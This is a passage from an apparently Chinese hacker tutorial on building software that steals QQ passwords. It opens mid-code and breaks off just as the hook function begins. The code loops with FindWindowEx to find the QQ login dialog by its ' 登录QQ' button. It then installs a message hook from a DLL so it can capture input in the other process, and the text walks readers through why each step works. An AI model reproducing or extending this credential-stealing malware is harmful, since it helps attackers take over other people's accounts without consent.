黑客心得：盗QQ密码的软件模拟实现技术

　　 {

　　//利用FindWindowEx查找QQ登陆窗口，具体参数意思请查MSDN

　　g_hQQLogin=FindWindowEx(NULL,g_hQQLogin,"#32770",NULL); //对话框的类都是#32770

　　//找到类名是#32770后，再在其窗体内找一个具有“ 登录QQ”的BUTTON按纽

　　hLogin = FindWindowEx(g_hQQLogin, NULL, "Button", " 登录QQ"); //这一句很关键，如果你的QQ登陆窗口上没有" 登录QQ"字样，那么获取密码将失败！

　　}

　　while(g_hQQLogin != NULL && hLogin == NULL); //直到找到指定的窗口，即：QQ登陆窗口

　　if (g_hQQLogin != NULL)

　　{

　　SetQQHook(g_hQQLogin);//安装HOOK，此函数在DLL文件中 第二部分中介绍

　　}

　　 }

　　上面就是查找QQ登陆窗口句柄的过程，从代码可以看出我用的方法：找一个其子窗体中有一个标题为“ 登录QQ”的BUTTON的对话框（这句话说得有点饶口，这句话如果也看不懂，下面您不用看了：（） 我最开始是想利用 FindWindow(NULL,"QQ用户登陆窗口")来查找，但是我用Spy++看了QQ登陆窗口的标题并不是“QQ用户登陆窗口”，而是“乱码”，其中包含了回车键等特殊字符，于是我用了FindWindowEx().

　　第二部分：（2）安装钩子

　　找到了QQ登陆窗口后，就成功了一半。：）

　　下面是DLL文件中的安装HOOK的函数SetQQHook(), 为什么要用DLL（动态连接库）？要去“钩”其他进程的消息，得让HOOK函数在DLL中，这样好映射到其地址空间中！

　　BOOL WINAPI SetQQHook(HWND hQQLogin)

　　{

　　//获得登陆框的句柄